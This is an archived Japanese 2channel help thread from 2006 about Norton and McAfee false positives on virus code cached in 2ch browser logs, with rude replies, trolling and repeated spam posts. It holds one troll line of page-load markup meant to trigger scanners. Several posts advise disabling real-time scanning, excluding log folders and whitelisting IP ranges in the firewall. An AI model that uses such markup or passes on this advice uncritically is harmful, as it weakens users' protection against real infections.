>>418
>>371の問題でもないってことでしょうか。
371の暫定対処をした場合はどうなりますか?

420:418
06/02/01 14:05:32 S10H/e1R
>>419
ありがとうごぜーます。
呼んできます。

421:ひよこ名無しさん
06/02/02 16:52:23 KtbG8KDn
>>1-9を読みましたか?            『YES』
マカフィーを使っているのですがdatファイルの入ったzipファイルを解凍しようと
すると「Exploit-mhtresir.gen」が発見されたので削除しますと言われzipファイルの中のdatを
他の場所に保存することもdatファイルを使うことも出来ないのですがどうすれば
zipファイルを解凍して中のdatファイルを使えるようになりますか?

OSはXP
アンチウイルスソフトはManaged virusScan plas AntiSpywareです。
お願いします。


422:ひよこ名無しさん
06/02/02 17:55:04 KtbG8KDn
他できいてみます。

423:名無しさん@お腹いぱーい。
06/02/02 23:44:24 BE:7074195-
>>421-422
> マカフィーを使っている
> datファイルの入ったzipファイル
2ちゃんねるブラウザのログファイルでは無い場合はこちらのスレでは扱っていません。
このスレでは「ノートントラップ」は2ちゃんねる(掲示板)にウイルスコードが貼り付けられ
Webブラウザや2ちゃんねるブラウザのログでノートンが誤反応することを指しています。

スレリンク(pcqa板:441番)
そのzipファイルがアップローダーで拾ったものならマカフィーは正常な反応を示しているかと思います。
念のためにオンラインスキャンしてみてください。
URLリンク(www.trendmicro.co.jp)

マカフィーについて以降はより詳しいあなたの環境(zipファイルの出所・何のアプリケーションに使われているのか等)を書いて
以下のスレにここから誘導されたことも併記してお尋ねください。
がんばれマカフィー Part.23 / ガンバレMcAfee
スレリンク(sec板)

もしマカフィーが2ちゃんねるブラウザのログで反応しているのならお手数ですがもう一度こちらに来てください。

424:ひよこ名無しさん
06/02/03 09:31:43 ZZST2Rw7
>>423
ご丁寧に解答を頂きありがとうございます。
datファイルの入ったzipファイルはある2ちゃんねるのスレのまとめサイト
からダウンロードしたファイルです。
オンラインスキャンでは何も見つからなかったです。
>もしマカフィーが2ちゃんねるブラウザのログで反応しているのなら
>お手数ですがもう一度こちらに来てください
datファイルは2ちゃんねるのスレッドのdatファイルなのですが
こちらでよろしいでしょうか?お願いします。


425:421
06/02/03 10:12:08 ZZST2Rw7
すいません>>421の者です。

426:名無しさん@お腹いぱーい。
06/02/03 13:48:07 BE:7545986-
>>424-425
おそらくそれはウイルスコードにマカフィーが誤反応しているものだと思われます。

他で教えていただいたのですがマカフィーにはノートンのようなウイルススキャンでフォルダ・ファイルの除外項目が無いそうです。
以下、現在の状況での対処方法です。

2ちゃんねるブラウザのJane派生のJaneViewでWickedStr.txtに手動で反応する文字列の一部を追記する。

誤反応スクリプト無効化ソフトURLリンク(www.geocities.jp)のアップデートを待って(現在マカフィートラップには対応していません)
 ActiveShieldを無効→対象スレを取得→「誤反応スクリプト無効化ソフト」を使ってウイルスコードを無効→ActiveShield有効

2ちゃんねるブラウザMonoViewのアップデートを待って(現在マカフィートラップには対応していません)読み込む。

一番いい方法はマカフィーに該当するdatファイルを送って対策を促すことだと思います。

マカフィーユーザーで既に対処の仕方を知っている方がいらっしゃるのかもしれませんので
>>423のマカフィーのスレでこちらのことを聞いてみていただけませんでしょうか。
対処方法がありましたらこちらのスレにもお知らせいただけると幸いです。

また参考のためにも今後もこちらに来ていただけると助かります。

ノートントラップとマカフィートラップのウイルスコードは違うようなので
ノートンでは反応しないでマカフィーが誤反応したりまたその逆もあります。
長々としましたがマカフィートラップについての決定打が見当たらないので手探りのレスを御許しください。

参考にマカフィートラップと思われるやり取りの過去ログです。
スレリンク(sec板:72-77番)+553-555+558-559+563
URLリンク(makimo.to:8000)

スレリンク(saku板:62-65番)n

URLリンク(jbbs.livedoor.jp)

427:421
06/02/03 14:40:06 ZZST2Rw7
>>426
わかりやすく説明していただき、
関連スレまで貼っていただいてありがとうございます。
ただ解決まではいけなかったので>>423の方で聞かせて頂きます。
何かわかりましたらこちらにも報告させて頂きますね。
ありがとうございました。

428:ひよこ名無しさん
06/02/06 19:42:50
なんかjaneでこのスレ読むとレス番がずれまくりなんですけど
これ直す方法はないんでしょうか…?何度再読み込みしても
421さんが406さんになっちゃいます…↓
> 406 名前:421[] 投稿日:2006/02/03(金) 14:40:06 ID:ZZST2Rw7

logフォルダの除外設定はしてあるので、先生も怒ってないんですが…

ノートン2004でxp。専ブラはjaneDoeView α051128です

429:ひよこ名無しさん
06/02/07 00:57:31 3ZNXNyQs
XPに最初から入ってるノートンをアンインスコしたらもう再インスコって出来ませんかね??

430:名無しさん@お腹いぱーい。
06/02/07 01:18:43 BE:5659294-
>>428
一旦ログを破棄してから読み込みでどうですか。
それと>>371にもありますがNIS(NPF)のファイアーウォールを誤作動させるコードもあるので
以下の設定もしてみてください。


現在、2ちゃんねるではNIS(NPF)のファイアーウォールを誤作動させるコードの書き込みが出回っています。
アンチウイルス(NAV)は反応しないのでファイアーウォールの設定を見直さなければなりませんがあくまで暫定的処置です。

2chNIS問題まとめページ
URLリンク(mickey.mirv.net)
ノートン応急対策
URLリンク(info.2ch.net)
URLリンク(ansitu.xrea.jp) URLリンク(ansitu.xrea.jp)
URLリンク(wiki.livedoor.jp)

この場合2ちゃんねるに対してファイアーウォールの機能は働きません。
また、同様なコードが2ちゃんねるではない外部板に貼られていても上記ページのような設定はお勧めしません。
シマンテックの対応待ちです。

アンチウイルス(NAV)の設定は>>1
URLリンク(ansitu.xrea.jp)

431:428
06/02/07 06:33:12
>>430
丁寧なレスありがとうございました。火壁の設定してログ捨ててみたら
ズレてるの直りました!感謝です!

432:421
06/02/07 09:35:42 mnvRCCNZ
以前こちらで質問させて頂いて誘導された者です。
解決方法がわかりましたのでその報告をさせて頂きます。

結論からいうとマカフィーが起動している時にzipファイルの中からdatファイルを
出す方法はありませんでした。
ただマカフィーの自動スキャンを一時的に止めてその間にzipファイルの中の
datファイルを取り出すことができました。
一時的に自動スキャンを止める方法は(以下コピペ)
URLリンク(www.mcafee.com)
>また、管理者権限でコンピュータにログオンし、[Ctrl]キーと[Shift]キーを押しながら
>タスクトレイのアイコンを右クリックすると、更に隠しメニューが表示されます。
>この隠しメニューから通常のメニューに加えて以下の操作を行うことができます。
>・隔離アイテムの一覧
>・VShieldを無効にする/VShieldを有効にする
>・終了
とのことでした。実際に試したところ成功いたしました。
またvbsウイルスソースが多々隔離されており消したところかなり早くなりました。
丁寧に教えてくれた皆さん、ありがとうございました。

433:ひよこ名無しさん
06/02/08 17:28:05
>>430
>この場合2ちゃんねるに対してファイアーウォールの機能は働きません。

ということですが、それはセキュリティ的には問題ないレベルなんですか?

あと↓によると
2chNIS問題まとめページ
URLリンク(mickey.mirv.net)

>以下の対処方法では除外するIPアドレスの範囲からの攻撃に対してNISは反応しなくなります。

とありますが、2ちゃん以外の場所で除外したIPアドレスを利用した
悪意ある攻撃があった場合は大丈夫なんでしょうか?
それとも除外したIPアドレスは2ちゃん以外では使われてないのでしょうか?

分かる方いらっしゃったらご教授お願いします

434:名無しさん@お腹いぱーい。
06/02/08 22:45:25 BE:6288858-
>>432
お知らせありがとうございます。
マカフィーについての解説を参照できますので助かりました。

>>433
> 2ちゃん以外の場所で除外したIPアドレスを利用した
> 悪意ある攻撃があった場合は大丈夫なんでしょうか?

2ちゃんねる以外のIPアドレスを除外することはここではお勧めしません。

また、2ちゃんねるからの攻撃・進入等はいままではありませんでした。
過去には踏み台pcを規制するための2ちゃんねるからのインバウンド TCP 接続信号を受け入れなければいけなかったこともあります。
URLリンク(pc.2ch.net) の7

只、何事も絶対安全ということはないのでセキュ板本スレを見るようにしてください。
なにかあったら祭りになりますので。
【ノートン】インターネットセキュリティ Ver.82【2006】
スレリンク(sec板)


> それとも除外したIPアドレスは2ちゃん以外では使われてないのでしょうか?

おそらくないはずですが、2ちゃんねるのIPアドレスそのものに関しては
以下のスレに誘導されたことを明記してお聞きください。
質問・雑談スレ215@運用情報板
スレリンク(operate板)

関連スレ
ノートン誤作動対策本部
スレリンク(operate板)

435:433
06/02/08 23:50:59
>>434
お答え頂いてありがとうございました
紹介して頂いたスレはお気に入りに登録しました
あと運用情報板に質問して、疑問も解消しました
ありがとうございました

436:ひよこ名無しさん
06/02/18 20:12:50
ここできいていいのかあれだけど、
updateして再起動してからjane開いて更新しようとすると

中危険度の小窓がいちいち表示されるようになった
「jane.exeがインターネットにアクセスしようとしています」
security無効にすると更新できるけど、前は有効のままで更新できてたの・・

解除方法おしえてくださいm(_ _)m

437:ひよこ名無しさん
06/02/18 20:37:00
FWが反応してるだけみたいだね。

アプリ登録するだけじゃないのかな。

まあ、ノートン使ってないんでFWの一般論だけど。


438:ひよこ名無しさん
06/02/24 07:54:27 /hbjD2Uq
2chブラウザのログ保存フォルダを「除外」に設定して、2ちゃんのスレで
ウイルス踏んじゃったらどうなるんですか?ノートンは守ってくれないんですか?

439:ひよこ名無しさん
06/02/24 09:20:24
そんなノートンは窓から捨てろwwwwwwwwwww

440:ひよこ名無しさん
06/02/24 14:13:12
>>438
2chブラウザのログ保存フォルダにウィルスが入り込むことはありません。
ノートンがログ保存フォルダからウィルスを見つけたと言い出しても、スレタイにある通り誤認です。
リンクをクリックして起動したWebブラウザがウィルスのあるページを読み込もうとしたときは
ちゃんと守ってくれます。

441:ひよこ名無しさん
06/02/24 23:01:38
>>438
              __
             /;;;;;;;;;;;;;\
            /;;:::::::::::::::::::::::\
       ∈=━/,,;;:::::::::::::::::::::::::.;ヽ━=∋
            L::;;,__     ..:::ゝ
          //;;;;::::::.. ̄ ̄ ̄ ̄..::::;;;ヽ
          / ;;;;;;;;:::::::::::;;;;;;;;;;;;;::::::::;;;;; ヽ
         /j/三三三三三三三三三三ヾ、
         l::||::::              |l  
        / ̄\ ヽ-=・=-′ヽ-=・=-′ ||  
      r┤    ト::::: \___/     ||     <信じろ!
     /  \_/ ヽ:::.  \/    ,ノ   
      |   _( ̄ l―---oo-―'"ヽ__
      |   _)_ノヽ\  ハ // /    ヽ   
     ヽ____)ノ      ̄ ̄ ̄   /     ヽ、

442:ひよこ名無しさん
06/02/24 23:29:37 /hbjD2Uq
>>440
ありがとうございます

443:ひよこ名無しさん
06/02/28 01:33:27 icpaH3Er
JANE DOE STYLEでvbs踏んで、20分後くらいから何かプログラムを実行しようとする度に
ノートンが「xxxxxが1つ以上の認識されないモジュールを使ってインターネットにアクセスしようとしています」
と出て、許可にしないとプログラム実行されず、何も出来ないのですが、これはウィルスに感染してるのでしょうか?
スキャンしても検出されず、過去ログ検索対象外にしても出続けます。
知恵をください。お願いします。

444:ひよこ名無しさん
06/02/28 09:18:46 GU2WNsCd
>>443
VBSを踏んだってのはソースが貼り付けてあるスレを開いたってこと?
それともVBSが実行されたってこと?

445:443
06/02/28 11:01:38
>>444
スレを開いただけです。
遮断ばかりしてたらいつの間にか上記のような状態になってしまってまして、
通信許可にしないと、どのプログラムも動きません。

446:ひよこ名無しさん
06/03/01 15:04:09
>>445
リストから全部削除しろ バカ
WindowsUpdateしていたら何にも感染などしねえわ

447:ひよこ名無しさん
06/03/01 21:25:32
>>446
> WindowsUpdateしていたら何にも感染などしねえわ

それはどうかな?

448:ひよこ名無しさん
06/03/02 19:57:05

>>371で板の見れない問題は解決したのですが、これは危険なのですか?
また暫定的処置という事ですが、なんらかの対応はあったのでしょうか?

449:ひよこ名無しさん
06/03/02 21:46:27
>>448
202.222.31.214 206.223.147.35 (ryって数字が並んでるでしょ。これは2chの鯖の
IPをそのまま列挙して「この鯖は誤作動を引き起こす可能性があるだけで実害はないから、
警告しなくていいよ」という指示だから、処置を適切にしてさえいれば、あんまり
深刻に考えないで良いです。

450:ひよこ名無しさん
06/03/02 21:49:48
>>446
Microsft Update 入れてください(><)

451:448
06/03/03 18:37:00
>>449
サンクス

452:ひよこ名無しさん
06/03/04 05:32:46
avastがvbsウィルスのソースに誤反応
ってスレも立ってほしいなあ

453:ひよこ名無しさん
06/03/13 18:59:55 V3zGYCXt
u

454:ひよこ名無しさん
06/03/13 21:10:07
元祖ぶる殿 ◆U/gDqFZzsY の 自作自演
スレリンク(win板:511-514番)

511 名前:Aya ◆U.S.S.po 投稿日:02/05/19 13:13
WIN2000を使っています。
一気にデスクトップを表示できるタスクバーにあったアイコン(ボードにペンのような印)が
なくなってしまいました。
スタート→設定→タスクバー~を見ても、タスクバー上で右クリックをしても
復活させ方が分かりません。
また左下にデスクトップへショートカット(?)出来るあのアイコンを出すにはどうしたら良いでしょう。


512 名前:Aya ◆U.S.S.po 投稿日:02/05/19 13:13
>>511
[Shell]
Command=2
IconFile=explorer.exe,3
[Taskbar]
Command=ToggleDesktop

これを デスクトップの表示.scf として保存、
クイック起動バーにD&D。


513 名前:名無し~3.EXE 投稿日:02/05/19 13:17
>>511-512
自作自演失敗?


514 名前:名無し~3.EXE 投稿日:02/05/19 13:19
でもなんで自演なんてするの?

455:ひよこ名無しさん
06/03/21 09:43:56 xHVuEeZu
u

456:ひよこ名無しさん
06/03/23 14:11:32 bCv+njJc
キタ━ <body onload=window()> ━━ !!

457:ひよこ名無しさん
06/03/23 14:12:39
>>456
さっさと消えろ バカ

458:ひよこ名無しさん
06/03/23 14:16:47 bCv+njJc
即反応かよ

459:ひよこ名無しさん
06/03/23 14:18:02
元祖ぶる殿 ◆U/gDqFZzsY の自作自演
スレリンク(pcqa板:837-846番)

837 名前:ひよこ名無しさん 投稿日:02/05/20 08:35 ID:GarmVKYa
あまりに馬鹿馬鹿しい質問ですいません。
Windows Media Plyaer と KbMedia Player  がパソコンの中にあるのですが、MP3ファイルをクリックすると
Windows Media Plyaer で再生してしまうのですが、ダブルクリックした際に後者で再生するようにはどうしたらいいんでしょうか?

838 名前:ひよこ名無しさん 投稿日:02/05/20 08:36 ID:???
>>837
またきたのか?
Windowsの入門書以上の書籍買って関連付けに関して理解を深めろ。

839 名前:Aya ◆U.S.S.po 投稿日:02/05/20 08:36 ID:GarmVKYa
>>837
1.mp3のファイルをクリック
2.「アプリケーションから開く」を選択
3.プログラムの選択
4.「これらのファイルを開くときは、
  いつもこのアプリケーションを使う」にチェック
5.OK

840 名前:ひよこ名無しさん 投稿日:02/05/20 08:37 ID:???
>>839
自作自演するときはIDを消しましょうね(ワラ

460:ひよこ名無しさん
06/03/23 22:58:37
元祖ぶる殿 ◆U/gDqFZzsY の 自作自演
スレリンク(win板:511-514番)

511 名前:Aya ◆U.S.S.po 投稿日:02/05/19 13:13
WIN2000を使っています。
一気にデスクトップを表示できるタスクバーにあったアイコン(ボードにペンのような印)が
なくなってしまいました。
スタート→設定→タスクバー~を見ても、タスクバー上で右クリックをしても
復活させ方が分かりません。
また左下にデスクトップへショートカット(?)出来るあのアイコンを出すにはどうしたら良いでしょう。


512 名前:Aya ◆U.S.S.po 投稿日:02/05/19 13:13
>>511
[Shell]
Command=2
IconFile=explorer.exe,3
[Taskbar]
Command=ToggleDesktop

これを デスクトップの表示.scf として保存、
クイック起動バーにD&D。


513 名前:名無し~3.EXE 投稿日:02/05/19 13:17
>>511-512
自作自演失敗?


514 名前:名無し~3.EXE 投稿日:02/05/19 13:19
でもなんで自演なんてするの?

461:ひよこ名無しさん
06/03/24 12:13:15 +3ig7Sae
総合質問のスレッドで質問したところ、ここに誘導されたので、
再度質問させていただきます。マルチになってしまいますが、お願いします。

OS:XPhome
使用ソフト:ノートンアンチウイルス2006

ウイルスコード的なワームのようなものが貼られたらしく、ノートンが侵入警告を出して、
その後、そのスレとセキュリティ板にアクセスできなくなりました。これは無害でしょうか?あと対処法も教えてください。
ノートンが出したメッセージは、よく覚えてませんが、「2ch」の文字列が始のほうにありました。
ログを削除したのでスレ番号&レス番号までは分かりませんが、初心者の質問板の物凄い勢いで誰かが質問に答える
スレです。昨日の11:30分ほどのレスだったと思います。

462:ひよこ名無しさん
06/03/24 12:14:12 +3ig7Sae
ちなみにjane doe styleで2ちゃんねるを閲覧しています。

463:ひよこ名無しさん
06/03/24 12:15:48
>461
質問する前にこのスレを読めと書いたはずだが

464:ひよこ名無しさん
06/03/24 12:15:50
>>461-462
おまえバカだろ


465:ひよこ名無しさん
06/03/24 12:27:10
>>461
>>4


466:ひよこ名無しさん
06/03/24 12:35:50 +3ig7Sae
ラブレターなどのウイルスではなくノートンプロテクションセンターが、侵入の試みを
遮断みたいなのが出るんですけど、このスレを全部読んでもどれが自分の症状の
解決策なのか分かりません・・・・。
ログのオートプロテクトの除外と手動スキャンの除外は前からしてあるのですが・・・・。
>>4を見ても何がなんだか・・・・。

467:ひよこ名無しさん
06/03/24 12:40:54
>>466
おまえが初めに質問したスレでの自分へのレスをちゃんとよめや

468:釣り氏 ◆RaigyoS2No
06/03/24 12:53:57
>>467
見てきましたが、当方インターネットセキュリティではなくアンチウイルスなので
書いてあることができません・・・・。

469:釣り氏 ◆RaigyoS2No
06/03/24 12:54:46 +3ig7Sae
これは他スレで使ってるコテなので気にしないでください。

470:ひよこ名無しさん
06/03/24 12:57:39
↓出身の方ですか。ご苦労様です。
URLリンク(www.redout.net)

471:ひよこ名無しさん
06/03/24 12:58:06
>>469
何だ釣りなのか。
思いっきり釣られちゃったよ(´∀`)
なかなかの釣り師ですね。

472:釣り氏 ◆RaigyoS2No
06/03/24 12:58:48 +3ig7Sae
具体的にどのレスの何を実行すればいいかということだけでも教えてくれませんか?

473:釣り氏 ◆RaigyoS2No
06/03/24 12:59:42 +3ig7Sae
>>471
このコテはリアルで魚釣りなんで・・・・。
マジレスお願いします・・・。

474:ひよこ名無しさん
06/03/24 13:00:55
釣り氏 ◆RaigyoS2Noで検索
URLリンク(www.google.com)

475:釣り氏 ◆RaigyoS2No
06/03/24 13:04:32 +3ig7Sae
すみません。これ以上いると荒れるようなので、これで失礼します・・・。
質問は却下ということでお願いします・・・・。

476:ひよこ名無しさん
06/03/24 13:05:10
>>473
何の魚を飼ってたの?環境省にごめんなさいしなきゃいけなかったなんて。。

477:ひよこ名無しさん
06/03/24 13:08:04
>>476
ブルーギル

478:ひよこ名無しさん
06/03/24 13:08:25
>>473
本当に「インターネットセキュリティではなくアンチウイルス」なら、これが
参考になるかも(自分は2年ほど前にノートンやめたので確認できないが)

スレリンク(operate板:781番)

479:ひよこ名無しさん
06/03/24 13:10:03
>>477
(ノ∀`) アチャー

480:名無しさん@お腹いぱーい。
06/03/24 21:51:35
緊急的に変えてみました。
URLリンク(info.2ch.net)

他にNAVのワーム誤反応に関する対処方法が見つかりましたらお知らせください。

481:ひよこ名無しさん
06/03/24 23:32:32 5GkwjhYT
>>480の誤反応スクリプトやろうと思ったけど、オートプロテクトを無効にしても攻撃を遮断するんだよね。
だからできなかった。まあIEで読めるからいいんだけどね。

482:ひよこ名無しさん
06/03/25 00:28:09 yFt5KPiX
カサマツさん

483:ひよこ名無しさん
06/03/25 10:37:30
ぼるぷー ◆sTCCYJJ/Lo の 自作自演
スレリンク(win板:511-514番)

511 名前:Aya ◆U.S.S.po 投稿日:02/05/19 13:13
WIN2000を使っています。
一気にデスクトップを表示できるタスクバーにあったアイコン(ボードにペンのような印)が
なくなってしまいました。
スタート→設定→タスクバー~を見ても、タスクバー上で右クリックをしても
復活させ方が分かりません。
また左下にデスクトップへショートカット(?)出来るあのアイコンを出すにはどうしたら良いでしょう。


512 名前:Aya ◆U.S.S.po 投稿日:02/05/19 13:13
>>511
[Shell]
Command=2
IconFile=explorer.exe,3
[Taskbar]
Command=ToggleDesktop

これを デスクトップの表示.scf として保存、
クイック起動バーにD&D。


513 名前:名無し~3.EXE 投稿日:02/05/19 13:17
>>511-512
自作自演失敗?


514 名前:名無し~3.EXE 投稿日:02/05/19 13:19
でもなんで自演なんてするの?


次ページ
最新レス表示
レスジャンプ
類似スレ一覧
スレッドの検索
話題のニュース
おまかせリスト
オプション
しおりを挟む
スレッドに書込
スレッドの一覧
暇つぶし2ch